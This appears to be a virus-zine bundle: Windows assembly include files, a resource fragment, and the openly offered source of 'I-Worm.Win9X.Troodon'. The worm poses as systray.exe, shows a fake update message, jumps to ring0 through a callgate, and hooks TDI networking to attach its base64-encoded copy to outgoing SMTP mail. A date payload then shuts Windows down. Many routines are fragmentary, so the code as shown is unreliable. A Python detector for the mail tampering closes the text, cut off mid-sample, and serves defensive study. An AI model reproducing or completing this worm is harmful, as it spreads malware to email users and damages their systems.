LB_GETHORIZONTALEXTENT = (WM_USER+20)
LB_SETHORIZONTALEXTENT = (WM_USER+21)
LB_SETTOPINDEX = (WM_USER+24)
LB_GETITEMRECT = (WM_USER+25)
LB_GETITEMDATA = (WM_USER+26)
LB_SETITEMDATA = (WM_USER+27)
LB_SELITEMRANGE = (WM_USER+28)
LB_SETCARETINDEX = (WM_USER+31)
LB_GETCARETINDEX = (WM_USER+32)
IFNDEF NOWIN31
LB_SETITEMHEIGHT = (WM_USER+33)
LB_GETITEMHEIGHT = (WM_USER+34)
LB_FINDSTRINGEXACT = (WM_USER+35)
ENDIF
ENDIF
; NOWINMESSAGES
; Listbox Styles
LBS_NOTIFY = 0001h
LBS_SORT = 0002h
LBS_NOREDRAW = 0004h
LBS_MULTIPLESEL = 0008h
LBS_OWNERDRAWFIXED = 0010h
LBS_OWNERDRAWVARIABLE = 0020h
LBS_HASSTRINGS = 0040h
LBS_USETABSTOPS = 0080h
LBS_NOINTEGRALHEIGHT = 0100h
LBS_MULTICOLUMN = 0200h
LBS_WANTKEYBOARDINPUT = 0400h
LBS_EXTENDEDSEL = 0800h
LBS_STANDARD = LBS_NOTIFY + LBS_SORT + WS_VSCROLL + WS_BORDER
LBS_DISABLENOSCROLL = 1000h
; Listbox Notification Codes
LBN_ERRSPACE = (-2)
LBN_SELCHANGE = 1
LBN_DBLCLK = 2
LBN_SELCANCEL = 3
LBN_SETFOCUS = 4
LBN_KILLFOCUS = 5
IFNDEF NOWINMESSAGES
ENDIF
; NOWINMESSAGES
IFNDEF NOWINMESSAGES
ENDIF
; NOWINMESSAGES
IFNDEF NOWINMESSAGES
ENDIF ;NOWINMESSAGES
; Dialog Codes
DLGC_WANTARROWS = 0001h ; /* Control wants arrow keys */
DLGC_WANTTAB = 0002h ; /* Control wants tab keys */
DLGC_WANTALLKEYS = 0004h ; /* Control wants all keys */
DLGC_WANTMESSAGE = 0004h ; /* Pass message to control */
DLGC_HASSETSEL = 0008h ; /* Understands EM_SETSEL message */
DLGC_DEFPUSHBUTTON = 0010h ; /* Default pushbutton */
DLGC_UNDEFPUSHBUTTON= 0020h ; /* Non-default pushbutton */
DLGC_RADIOBUTTON = 0040h ; /* Radio button */
DLGC_WANTCHARS = 0080h ; /* Want WM_CHAR messages */
DLGC_STATIC = 0100h ; /* Static item: don't include */
DLGC_BUTTON = 2000h ; /* Button item: can be checked */
IFNDEF NOWINMESSAGES
ENDIF ; NOWINMESSAGES
IFNDEF NOWIN31
IFNDEF NOWINMESSAGES
IFNDEF NOSYSMETRICS
; GetSystemMetrics() codes
SM_CXSCREEN = 0
SM_CYSCREEN = 1
SM_CXVSCROLL = 2
SM_CYHSCROLL = 3
SM_CYCAPTION = 4
SM_CXBORDER = 5
SM_CYBORDER = 6
SM_CXDLGFRAME = 7
SM_CYDLGFRAME = 8
SM_CYVTHUMB = 9
SM_CXHTHUMB = 10
SM_CXICON = 11
SM_CYICON = 12
SM_CXCURSOR = 13
SM_CYCURSOR = 14
SM_CYMENU = 15
SM_CXFULLSCREEN = 16
SM_CYFULLSCREEN = 17
SM_CYKANJIWINDOW = 18
SM_MOUSEPRESENT = 19
SM_CYVSCROLL = 20
SM_CXHSCROLL = 21
SM_DEBUG = 22
SM_SWAPBUTTON = 23
SM_RESERVED1 = 24
SM_RESERVED2 = 25
SM_RESERVED3 = 26
SM_RESERVED4 = 27
SM_CXMIN = 28
SM_CYMIN = 29
SM_CXSIZE = 30
SM_CYSIZE = 31
SM_CXFRAME = 32
SM_CYFRAME = 33
SM_CXMINTRACK = 34
SM_CYMINTRACK = 35
IFNDEF NOWIN31
SM_CXDOUBLECLK = 36
SM_CYDOUBLECLK = 37
SM_CXICONSPACING = 38
SM_CYICONSPACING = 39
SM_MENUDROPALIGNMENT = 40
SM_PENWINDOWS = 41
SM_DBCSENABLED = 42
ENDIF
SM_CMETRICSMAX = 43
ENDIF ;NOSYSMETRICS
IFNDEF NOCOLOR
COLOR_SCROLLBAR = 0
COLOR_BACKGROUND = 1
COLOR_ACTIVECAPTION = 2
COLOR_INACTIVECAPTION = 3
COLOR_MENU = 4
COLOR_WINDOW = 5
COLOR_WINDOWFRAME = 6
COLOR_MENUTEXT = 7
COLOR_WINDOWTEXT = 8
COLOR_CAPTIONTEXT = 9
COLOR_ACTIVEBORDER = 10
COLOR_INACTIVEBORDER = 11
COLOR_APPWORKSPACE = 12
COLOR_HIGHLIGHT = 13
COLOR_HIGHLIGHTTEXT = 14
COLOR_BTNFACE = 15
COLOR_BTNSHADOW = 16
COLOR_GRAYTEXT = 17
COLOR_BTNTEXT = 18
IFNDEF NOWIN31
COLOR_INACTIVECAPTIONTEXT = 19
COLOR_BTNHILIGHT = 20
ENDIF
ENDIF ;NOCOLOR
IFNDEF NOCOMM
NOPARITY = 0
ODDPARITY = 1
EVENPARITY = 2
MARKPARITY = 3
SPACEPARITY = 4
ONESTOPBIT = 0
ONE5STOPBITS = 1
TWOSTOPBITS = 2
; Error Flags
CE_RXOVER = 0001h ; /* Receive Queue overflow */
CE_OVERRUN = 0002h ; /* Receive Overrun Error */
CE_RXPARITY = 0004h ; /* Receive Parity Error */
CE_FRAME = 0008h ; /* Receive Framing error */
CE_BREAK = 0010h ; /* Break Detected */
CE_CTSTO = 0020h ; /* CTS Timeout */
CE_DSRTO = 0040h ; /* DSR Timeout */
CE_RLSDTO = 0080h ; /* RLSD Timeout */
CE_TXFULL = 0100h ; /* TX Queue is full */
CE_PTO = 0200h ; /* LPTx Timeout */
CE_IOE = 0400h ; /* LPTx I/O Error */
CE_DNS = 0800h ; /* LPTx Device not selected */
CE_OOP = 1000h ; /* LPTx Out-Of-Paper */
CE_MODE = 8000h ; /* Requested mode unsupported */
; Events
EV_RXCHAR = 0001h ; /* Any Character received */
EV_RXFLAG = 0002h ; /* Received certain character */
EV_TXEMPTY = 0004h ; /* Transmit Queue Empty */
EV_CTS = 0008h ; /* CTS changed state */
EV_DSR = 0010h ; /* DSR changed state */
EV_RLSD = 0020h ; /* RLSD changed state */
EV_BREAK = 0040h ; /* BREAK received */
EV_ERR = 0080h ; /* Line status error occurred */
EV_RING = 0100h ; /* Ring signal detected */
EV_PERR = 0200h ; /* Printer error occurred */
EV_CTSS = 0400h ; /* CTS state */
EV_DSRS = 0800h ; /* DSR state */
EV_RLSDS = 1000h ; /* RLSD state */
EV_RingTe = 2000h ; /* Ring Trailing Edge Indicator */
; Escape Functions
SETXOFF = 1 ; /* Simulate XOFF received */
SETXON = 2 ; /* Simulate XON received */
SETRTS = 3 ; /* Set RTS high */
CLRRTS = 4 ; /* Set RTS low */
SETDTR = 5 ; /* Set DTR high */
CLRDTR = 6 ; /* Set DTR low */
RESETDEV = 7 ; /* Reset device if possible */
IFNDEF NOWIN31
; new escape functions
GETMAXLPT equ 8 ; Max supported LPT id
GETMAXCOM equ 9 ; Max supported COM id
GETBASEIRQ equ 10 ; Get port base & irq for a port
ENDIF
DCB struc
DCB_Id db ? ; /* Internal Device ID */
DCB_BaudRate dw ? ; /* Baudrate at which running */
DCB_ByteSize db ? ; /* Number of bits/byte, 4-8 */
DCB_Parity db ? ; /* 0-4=None,Odd,Even,Mark,Space */
DCB_StopBits db ? ; /* 0,1,2 = 1, 1.5, 2 */
DCB_RlsTimeout dw ? ; /* Timeout for RLSD to be set */
DCB_CtsTimeout dw ? ; /* Timeout for CTS to be set */
DCB_DsrTimeout dw ? ; /* Timeout for DSR to be set */
DCB_BitMask1 db ?
DCB_BitMask2 db ?
COMSTAT struc
COMS_BitMask1 db ?
ENDIF ;NOCOMM
;
; Installable Driver Support
;
; Driver Messages
DRV_LOAD = 0001h
DRV_ENABLE = 0002h
DRV_OPEN = 0003h
DRV_CLOSE = 0004h
DRV_DISABLE = 0005h
DRV_FREE = 0006h
DRV_CONFIGURE = 0007h
DRV_QUERYCONFIGURE = 0008h
DRV_INSTALL = 0009h
DRV_REMOVE = 000Ah
DRV_EXITSESSION = 000Bh
DRV_POWER = 000Fh
DRV_RESERVED = 0800h
DRV_USER = 4000h
DRVCNF_CANCEL = 0000h
DRVCNF_OK = 0001h
DRVCNF_RESTART = 0002h
IFNDEF NOKERNEL
;
; Common Kernel errors
;
ERR_GALLOC = 01030h ; GlobalAlloc Failed
ERR_GREALLOC = 01031h ; GlobalReAlloc Failed
ERR_GLOCK = 01032h ; GlobalLock Failed
ERR_LALLOC = 01033h ; LocalAlloc Failed
ERR_LREALLOC = 01034h ; LocalReAlloc Failed
ERR_LLOCK = 01035h ; LocalLock Failed
ERR_ALLOCRES = 01036h ; AllocResource Failed
ERR_LOCKRES = 01037h ; LockResource Failed
ERR_LOADMODULE = 01038h ; LoadModule failed
;
; Common User Errors
;
ERR_CREATEDLG = 01045h ; /* Create Dlg failure due to LoadMenu failure */
ERR_CREATEDLG2 = 01046h ; /* Create Dlg failure due to CreateWindow Failure */
ERR_REGISTERCLASS = 01047h ; /* RegisterClass failure due to Class already registered */
ERR_DCBUSY = 01048h ; /* DC Cache is full */
ERR_CREATEWND = 01049h ; /* Create Wnd failed due to class not found */
ERR_STRUCEXTRA = 01050h ; /* Unallocated Extra space is used */
ERR_LOADSTR = 01051h ; /* LoadString() failed */
ERR_LOADMENU = 01052h ; /* LoadMenu Failed */
ERR_NESTEDBEGINPAINT = 01053h ; /* Nested BeginPaint() calls */
ERR_BADINDEX = 01054h ; /* Bad index to Get/Set Class/Window Word/Long */
ERR_CREATEMENU = 01055h ; /* Error creating menu */
;
; Common GDI Errors
;
ERR_CREATEDC = 01070h ; /* CreateDC/CreateIC etc., failure */
ERR_CREATEMETA = 01071h ; /* CreateMetafile failure */
ERR_DELOBJSELECTED = 01072h ; /* Bitmap being deleted is selected into DC */
ERR_SELBITMAP = 01073h ; /* Bitmap being selected is already selected elsewhere */
ENDIF ;NOKERNEL
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[WINDOWS.INC]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[WSOCKS.INC]ÄÄÄ
;
; WSocks.inc: include file for windows sockets .
; Designed for TASM5 and Win32.
;
; (C) 1999 Bumblebee.
;
; This file contains basic structures and stuff to work
; with windows sockets.
;
; closes a socket
; socket descriptor
;
extrn closesocket:PROC
; sends data (these socks are shit... Unix uses a simple write)
; flags (1 OOB data or 0 normal), length, addr of buffer, socket
; returns: characters sent or SOCKET_ERR on error
extrn send:PROC
; receives data (these socks are shit... Unix uses a simple read)
; flags (use 0), length, addr of buffer, socket
; returns: characters received or SOCKET_ERR on error
extrn recv:PROC
; connects to a server
; sizeof struct SOCKADDR, struct SOCKADDR, socket
; returns: SOCKET_ERR on error
extrn connect:PROC
; types of sockets
SOCK_STREAM equ 1 ; stream (connection oriented; telnet like)
SOCK_DGRAM equ 2 ; datagram (packets, packets, packets)
; protocol
PCL_NONE equ 0 ; none (define the protocol not needed)
11 ICON "icecubes.ico"
EDITTEXT IDC_EDIT3,75,35,34,12,ES_AUTOHSCROLL
CONTROL "Spin1",IDC_SPIN1,"msctls_updown32",UDS_ARROWKEYS,108,35,
8,12
EDITTEXT IDC_EDIT1,75,53,43,13,ES_AUTOHSCROLL
LTEXT "bytes of un-saved changes",IDC_STATIC,130,55,94,13
EDITTEXT IDC_EDIT2,100,128,18,12,ES_AUTOHSCROLL
PUSHBUTTON "Cancel",IDC_BUTTON1,122,233,50,12
DEFPUSHBUTTON "Ok",IDC_BUTTON2,64,233,50,12
END
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[ICECUBES.RC]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[TROODON.ASM]ÄÄÄ
; I-Worm.Win9X.Troodon Project
;-----------------------------------------
; Technical details:
; This is a Win95/98-specific Internet worm which spreads through e-mail.
; When executed it does several things, in ring3 and in ring0 too.
; - ring3 actions -
; - it looks very similar to a normal Windows application which has a window etc.
; So it has a window and a message loop. This is needed by the payload, which will
; activate on a specific date (check code). When the payload is triggered, the
; foreground window on the desktop will start bouncing around on the screen for
; 30 seconds, then Windows will shut down.
; This is the payload part; it will activate only if it is running under the name
; "systray.exe".
; - when starting it checks if it is already installed in the system: it checks if
; its name is "systray.exe".
; If not, then it copies itself into the System directory under the name
; "systray.me"; by using wininit.ini, systray.exe will be replaced by systray.me on
; the next startup, and the original systray.exe will be saved as systray.sys.
; If the name isn't systray.exe then it will show a message to fool the user that
; all is ok.
; If the name is systray.exe then it will run the saved systray.sys using WinExec
; and it will assume that it is already installed in the system.
; - it will encode the current process's file in base64 and save it in memory
; allocated with VirtualAlloc
; - it will check for a signature in memory at 0xC000E990
; If not in memory then it will jump into ring0 by using the callgate method
; described by Zombie, by patching the LDT table.
;
; - ring0 actions -
; - it allocates memory in ring0 for its own code and for the encoded file.
; - it copies itself and the encoded file in there (after jumping back into ring3
; the memory used for the encoded file will be freed).
; - it will hook TdiConnect, TdiSend, TdiCloseConnection and TdiDisconnect for its
; own use.
; - it will monitor all outgoing connections, checking for SMTP (port 25) connections.
; - when it finds one it will wait for the DATA command for the SMTP server
; - then it will check the content of the e-mail; if it is a MIME-formatted e-mail
; containing text/plain or text/html or both, it will modify the message,
; attaching its own code (encoded in base64) to the mail.
;
; It has its own string routines.
; Things I didn't do in this version are: it doesn't attach to mails that already
; have attachments, and to mails with no MIME content.
;
;
; This is done using NASM syntax.
; Compilation and linking:
; NASMW -f win32 v.asm
; GORC /r vres.rc
; ALINK -entry start -oPE v.obj vres.res kernel32.lib user32.lib gdi32.lib
extern ExitProcess
extern RegisterServiceProcess
extern GetModuleHandleA
extern GetModuleFileNameA
extern CopyFileA
extern DeleteFileA
extern WritePrivateProfileStringA
extern WinExec
extern VirtualAlloc
extern VirtualFree
extern CreateFileA
extern GetFileSize
extern CloseHandle
extern CreateFileMappingA
extern MapViewOfFile
extern UnmapViewOfFile
extern MessageBoxA
extern GetForegroundWindow
extern GetWindowRect
extern MoveWindow
extern RegisterClassA
extern CreateWindowExA
extern ShowWindow
extern UpdateWindow
extern GetMessageA
extern TranslateMessage
extern DispatchMessageA
extern PostQuitMessage
extern DefWindowProcA
extern SetTimer
extern GetLocalTime
extern ExitWindowsEx
extern GetSystemDirectoryA
extern lstrcatA
%include "win32n.inc"
%include "vxdn.inc"
global start
[bits 32]
[section .text]
start:
%define ebp_hInstance ebp+8 ; handle of current instance
%define ebp_hPrevInstance ebp+0ch ; handle of previous instance
%define ebp_lpszCmdLine ebp+10h ; pointer to command line
%define ebp_nCmdShow ebp+14h ; show state of window
push ebp
mov ebp,esp
test eax,eax
jnz .Success
.Success:
test eax,eax
jnz .Success
push eax
call UpdateWindow
jmp MsgLoop
WndProc:
%define ebp_hWnd ebp+8 ; handle of window
%define ebp_Msg ebp+0ch ; message
%define ebp_wParam ebp+10h ; first message parameter
%define ebp_lParam ebp+14h ; second message parameter
%define ebp_DC ebp-4
push ebp
mov ebp,esp
.DefMsgHandler:
push dword [ebp_lParam]
push dword [ebp_wParam]
push dword [ebp_Msg]
push dword [ebp_hWnd]
call DefWindowProcA
Create_Handler:
; check if the name of the file is "systray.exe"
call check_systray
; Get out
push dword 0
call ExitProcess
.next_1: ; next is for payload
cmp word [STime+SYSTEMTIME.wDayOfWeek], 6
jne .exit
push dword 0
push dword 1
push dword ID_TIMER1
push dword [ebp_hWnd]
call SetTimer
push dword 0
push dword 300000
push dword ID_TIMER2
push dword [ebp_hWnd]
call SetTimer
Timer_Handle:
; this is for payload again
cmp dword [ebp_wParam], ID_TIMER1
jnz .next_1
jmp .timer_1
.next_1: cmp dword [ebp_wParam], ID_TIMER2
jnz .next_2
jmp .timer_2
.next_2: jmp WndProc.Exit
; "Restore" window
push dword SW_RESTORE
push eax
call ShowWindow
; move it
push dword 1
mov eax, [rect+RECT.bottom]
sub eax, [rect+RECT.top]
push eax
mov eax, [rect+RECT.right]
sub eax, [rect+RECT.left]
push eax
mov eax, [rect+RECT.top]
add eax, [y]
push eax
mov eax, [rect+RECT.left]
add eax, [x]
push eax
push dword [hWnd]
call MoveWindow
jmp WndProc.Exit
Destroy_Handler:
push dword 0
call PostQuitMessage
jmp WndProc.Exit
jmp WndProc.DefMsgHandler
;------------------------------------------------------------
; Here starts the part which makes this an I-Worm
;------------------------------------------------------------
iworm: pushad
.systray_over:
; signature
mov eax, 0xC000E990 ; check if already there
cmp dword [eax], 'WORM'
;------------------------------------------------------------
; Ring0Proc
;------------------------------------------------------------
Ring0Proc pushf
pushad
; copy it there
mov esi, dword [encoded_addr]
mov edi, eax
mov ecx, dword [encoded_size]
repz movsb
;------------------------------------------------------------
; This code will be executed only in heap
;------------------------------------------------------------
heap_code: pushf
pushad
popad
popf
ret
;------------------------------------------------------------
; TdiHook
;------------------------------------------------------------
TdiHook: ; now I need to hook the TDI functions I need
pushad
.exit: popad
ret
;------------------------------------------------------------
; TdiConnect_Hook
;------------------------------------------------------------
TdiConnect_Hook:; MOV EDI, <address_of_code_in_heap>
db 0xBF
TdiConnect_Delta:dd 0
sub edi, start
push ebp
mov ebp, esp
pushf
pushad
TdiConnect_Hook_Jmp:
popad
popf
pop ebp
; jmp [TdiConnect_Jmp]
db 0xFF, 0x25
TdiConnect_Jmp: dd 0
;------------------------------------------------------------
; TdiSend_Hook
;------------------------------------------------------------
TdiSend_Hook:
push ebp
mov ebp, esp
pushf
pushad
jmp .exit
.not_found_1:
jmp .exit
.found_1: mov [edi + mark1], esi ; save the position of "Content-Type", which is the beginning of the text mail
call strncmpi
test eax, eax
jne .not_textplain
mov byte [edi + mailtype], 1 ; text/plain
jmp .go_for_it
.not_textplain:
lea edx, [edi + strMultipartAlternative]
push esi
push edx
pop esi
call strlen
push eax
pop ecx
pop esi
call strncmpi
test eax, eax
jne .not_multipartalternative
mov byte [edi + mailtype], 2 ; text/plain + text/html
jmp .go_for_it
.not_multipartalternative:
lea edx, [edi + strMultipartMixed]
push esi
push edx
pop esi
call strlen
push eax
pop ecx
pop esi
call strncmpi
test eax, eax
jne .not_multipartmixed
mov byte [edi + mailtype], 3 ; text + probably attachement
; jmp .go_for_it
.not_multipartmixed:
jmp .exit
.go_for_it: ; EIP reached here if the e-mail is text/plain
; find the end of mail and save it
mov esi, [edi + sourcebuf]
.again_1: cmp byte [esi], 0
je .found_2
inc esi
jmp .again_1
.found_2: mov [edi + mark2], esi
; close boundary
lea esi, [edi + myEndBoundary]
call strlen
mov ecx, eax
call strncpy
.exit: popad
popf
pop ebp
; jmp [TdiSend_Jmp]
db 0xFF, 0x25
TdiSend_Jmp dd 0
;------------------------------------------------------------
; TdiDisconnect_Hook
;------------------------------------------------------------
TdiDisconnect_Hook:
push ebp
mov ebp, esp
pushf
pushad
.exit: popad
popf
pop ebp
; jmp [TdiDisconnect_Jmp]
db 0xFF, 0x25
TdiDisconnect_Jmp:dd 0
;------------------------------------------------------------
; TdiCloseConnection_Hook
;------------------------------------------------------------
TdiCloseConnection_Hook:
push ebp
mov ebp, esp
pushf
pushad
.exit: popad
popf
pop ebp
; jmp [TdiCloseConnection_Jmp]
db 0xFF, 0x25
TdiCloseConnection_Jmp:
dd 0
;------------------------------------------------------------
; String comparison, not case sensitive
;------------------------------------------------------------
; Params:
; ESI = source
; EDX = destination
; ECX = length
; Return:
; EAX = 0 if strings match
; EAX = 1 if not match
;------------------------------------------------------------
strncmpi: pushf
pushad
.done_with_1:
; if the character is upper case then make it lower case
cmp al, 0x41 ; 'A'
jge .great_then_A_2
jmp .done
.great_then_A_2:
cmp al, 0x5A ; 'Z'
jbe .less_then_Z_2
jmp .done
.less_then_Z_2:
add al, 0x20
inc esi
inc edx
loop .loop
;------------------------------------------------------------
; String length
;------------------------------------------------------------
; Params:
; ESI = source
; Return:
; EAX = length
;------------------------------------------------------------
strlen: push ebx
push ecx
push edx
push esi
push edi
push ebp
pop ebp
pop edi
pop esi
pop edx
pop ecx
pop ebx
ret
;------------------------------------------------------------
; String copy (length specified)
;------------------------------------------------------------
; Params:
; ESI = source
; EDX = destination
; ECX = length
;------------------------------------------------------------
strncpy: pushf
pushad
cld
mov edi, edx
repz movsb
.exit: popad
popf
ret
;------------------------------------------------------------
; Encode in base64 the file
;------------------------------------------------------------
; Params:
; ESI = source filename
; Return:
; EAX = address of encoded buffer
; ECX = size of encoded file
;------------------------------------------------------------
encode: pushad
; open file
push dword 0
push dword 0
push dword 3
push dword 0
push dword 1
push dword 0xC0000000 ; GENERIC_READ | GENERIC_WRITE
push esi
call CreateFileA
mov dword [hFile], eax
inc eax
mov bx, word [eax]
xchg bl, bh
shr bx, 6
mov bh, 0
and bl, 00111111b
mov bh, byte [edi + ebx]
mov byte [edx + esi], bh
inc esi
inc eax
xor ebx, ebx
mov bl, byte [eax]
and bl, 00111111b
mov bh, byte [edi + ebx]
mov byte [edx + esi], bh
inc esi
inc eax
sub ecx, 3
cmp ecx, 0
jne .loop
popad
mov eax, dword [encoded_addr]
mov ecx, dword [encoded_size]
ret
;------------------------------------------------------------
; Close encode (free allocated memory)
;------------------------------------------------------------
close_encode: pushad
push dword [encoded_addr]
push dword 0x00000000
push dword 0x00008000
call VirtualFree
popad
ret
;------------------------------------------------------------
; Ring 0 Callgate
;------------------------------------------------------------
CGS equ 8
callgate: pushad
push ebx
sgdt [esp - 0x02]
pop ebx
xor eax, eax
sldt ax
and al, 0xF8
popad
ret
;------------------------------------------------------------
; Check if systray
;------------------------------------------------------------
check_systray:
pushad
.systray_again:
call strncmpi
dec ebx
test ebx, ebx
je .not_systray
inc esi
test eax, eax
jne .systray_again
jmp .systray
.not_systray:
popad
mov byte [systray_ornot], 0
ret
.systray: popad
mov byte [systray_ornot], 1
ret
;------------------------------------------------------------
; Make paths for use in installation etc.
;------------------------------------------------------------
make_paths: pushad
push dword 260
push dword systray.exe
call GetSystemDirectoryA
popad
ret
;beep: pushad
; mov ax, 1000
; mov bx, 200
; mov cx, ax
; mov al, 0xB6
; out 0x43, al
; mov dx, 0x0012
; mov ax, 0x34DC
; div cx
; out 0x42, al
; mov al, ah
; out 0x42, al
; in al, 0x61
; mov ah, al
; or al, 0x03
; out 0x61, al
;l1: mov ecx, 4680
;l2: loop l2
; dec bx
; jnz l1
; mov al, ah
; out 0x61, al
;
; popad
; ret
[section .data]
my_path times 300 db 0
path_len dd 300
systray.exe times 260 db 0
systray.exe_ db '\systray.exe', 0
systray.sys times 260 db 0
systray.sys_ db '\systray.sys', 0
systray.me times 260 db 0
systray.me_ db '\systray.me', 0
wininit.ini db 'wininit.ini', 0
rename db 'Rename', 0
systray_exe db 'SYSTRAY.EXE', 0
systray_exe_len dd 11 ; size of the string above
tempFileName db '\systray.tmp', 0
systray_ornot db 0 ; 0 - "myself" isn't systray.exe :)
; 1 - "myself" is systray.exe :)
msgCaption db 'Windows TCP/IP Update', 0
msgContent db "The system doesn't need an update.", 13, 10
db 'Latest version of TCP/IP already present.', 0
hFile dd 0
hMap dd 0
pMap dd 0
dwFileSize dd 0
dwBufSize dd 0
encoded_addr dd 0
heap_enc_addr dd 0
encoded_size dd 0
encTable db 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
pad db '='
pad_no dd 0
mailtype db 0
codeaddr dd 0
codesize dd 0
TCPName db 'MSTCP', 0
TdiDispatchTable dd 0
TdiConnect_PrevAddr dd 0
TdiSend_PrevAddr dd 0
TdiDisconnect_PrevAddr dd 0
TdiCloseConnection_PrevAddr dd 0
TraceHandle dd 0
NextIsMail db 0
sourcebuf dd 0
buflen dd 0
search_str db 'DATA', 0x0D, 0x0A, 0
newmailaddr dd 0
;newmaillen dd 0
strContentType db 'Content-Type:', 0
strMultipartAlternative db 'multipart/alternative', 0
strMultipartMixed db 'multipart/mixed', 0
strTextPlain db 'text/plain', 0
strTextHtml db 'text/html', 0
strApp db 'application/x-msdownload', 0
mark1 dd 0
mark2 dd 0
hWnd dd 0
WindowHandle dd 0
ClassName db 'I-Worm', 0
WindowTitle db 'Troodon', 0
x dd step
y dd step
rect: ISTRUC RECT
at RECT.left, dd 0
at RECT.top, dd 0
at RECT.right, dd 0
at RECT.bottom, dd 0
IEND
WindowClassStruc:
ISTRUC WNDCLASS
at WNDCLASS.style, dd 0
at WNDCLASS.lpfnWndProc, dd WndProc
at WNDCLASS.cbClsExtra, dd 0
at WNDCLASS.cbWndExtra, dd 0
at WNDCLASS.hInstance, dd 0
at WNDCLASS.hIcon, dd NULL
at WNDCLASS.hCursor, dd NULL
at WNDCLASS.hbrBackground, dd 1
at WNDCLASS.lpszMenuName, dd NULL
at WNDCLASS.lpszClassName, dd ClassName
IEND
WindowMSG:
ISTRUC MSG
at MSG.hwnd, dd 0
at MSG.message, dd 0
at MSG.wParam, dd 0
at MSG.lParam, dd 0
at MSG.time, dd 0
IEND
STime:
ISTRUC SYSTEMTIME
at SYSTEMTIME.wYear, dw 0
at SYSTEMTIME.wMonth, dw 0
at SYSTEMTIME.wDayOfWeek, dw 0
at SYSTEMTIME.wDay, dw 0
at SYSTEMTIME.wHour, dw 0
at SYSTEMTIME.wMinute, dw 0
at SYSTEMTIME.wSecond, dw 0
at SYSTEMTIME.wMilliseconds, dw 0
IEND
end:
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[TROODON.ASM]ÄÄÄ
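The mail-modification step in the Troodon technical details (wait for the SMTP DATA command, classify the outer Content-Type, append a base64-encoded executable part) is exactly what a mail gateway or network sensor can check for from the other side. The Python below is an added example, not code from the zine or from the worm's author: it assumes a client-side SMTP capture as input, uses a constructed sample message, and the executable content types listed beyond application/x-msdownload are my assumption.

```python
"""Gateway-side check for the SMTP tampering described in the Troodon notes."""
from typing import List, Optional, Tuple
import base64
import email
from email import policy
from email.message import Message

# Outer Content-Type values the worm's TdiSend hook distinguishes, mapped to the
# mailtype codes its data section uses (1 text/plain, 2 multipart/alternative,
# 3 multipart/mixed, which this worm version skips).
WORM_MAILTYPES = {
    "text/plain": 1,
    "multipart/alternative": 2,
    "multipart/mixed": 3,
}

# Part types worth decoding; x-msdownload is the string the worm carries, the
# other two are assumed here as common labels for executable attachments.
EXECUTABLE_TYPES = {
    "application/x-msdownload",
    "application/x-msdos-program",
    "application/octet-stream",
}

SMTP_DATA = b"DATA\r\n"   # the worm waits for this command before acting
SMTP_END = b"\r\n.\r\n"   # end-of-data marker sent by the client


def extract_data_payload(client_stream: bytes) -> Optional[bytes]:
    """Return the message sent after the DATA command, with SMTP dot-stuffing
    removed, or None when the capture has no complete DATA section."""
    start = client_stream.find(SMTP_DATA)
    if start < 0:
        return None
    body_start = start + len(SMTP_DATA)
    # search two bytes earlier so an empty body (DATA\r\n.\r\n) is found too
    end = client_stream.find(SMTP_END, body_start - 2)
    if end < 0:
        return None
    lines = client_stream[body_start:end].split(b"\r\n")
    unstuffed = [ln[1:] if ln.startswith(b"..") else ln for ln in lines]
    return b"\r\n".join(unstuffed) + b"\r\n"


def classify_outer_type(msg: Message) -> Optional[int]:
    """Worm-style classification of the top-level Content-Type (None = ignored)."""
    return WORM_MAILTYPES.get(msg.get_content_type())


def looks_like_pe(data: bytes) -> bool:
    """Cheap PE check: a Win32 executable begins with the DOS 'MZ' stub."""
    return data[:2] == b"MZ"


def find_executable_parts(msg: Message) -> List[Tuple[str, Optional[str], bool]]:
    """List (content type, filename, decodes-to-PE) for every executable part."""
    hits = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        ctype = part.get_content_type()
        if ctype in EXECUTABLE_TYPES:
            payload = part.get_payload(decode=True) or b""   # undoes base64
            hits.append((ctype, part.get_filename(), looks_like_pe(payload)))
    return hits


def scan_stream(client_stream: bytes):
    """Classify the outgoing mail like the worm does and report executable parts."""
    payload = extract_data_payload(client_stream)
    if payload is None:
        return None, []
    msg = email.message_from_bytes(payload, policy=policy.default)
    return classify_outer_type(msg), find_executable_parts(msg)


# Constructed sample: an outgoing mail that has been turned into a multipart
# with an executable part appended. The attachment is only a DOS header stub
# (not a program); the filename echoes the one in the worm's resource file.
FAKE_PE = b"MZ\x90\x00" + bytes(60)
SAMPLE_STREAM = (
    b"EHLO client.example.test\r\n"
    b"MAIL FROM:<user@example.test>\r\n"
    b"RCPT TO:<friend@example.test>\r\n"
    b"DATA\r\n"
    b"From: user@example.test\r\n"
    b"To: friend@example.test\r\n"
    b"Subject: hi\r\n"
    b"MIME-Version: 1.0\r\n"
    b'Content-Type: multipart/mixed; boundary="B1"\r\n'
    b"\r\n"
    b"--B1\r\n"
    b"Content-Type: text/plain\r\n"
    b"\r\n"
    b"..leading dot, stuffed by the client\r\n"
    b"see you tomorrow\r\n"
    b"--B1\r\n"
    b'Content-Type: application/x-msdownload; name="TCPIPUPD.EXE"\r\n'
    b"Content-Transfer-Encoding: base64\r\n"
    b'Content-Disposition: attachment; filename="TCPIPUPD.EXE"\r\n'
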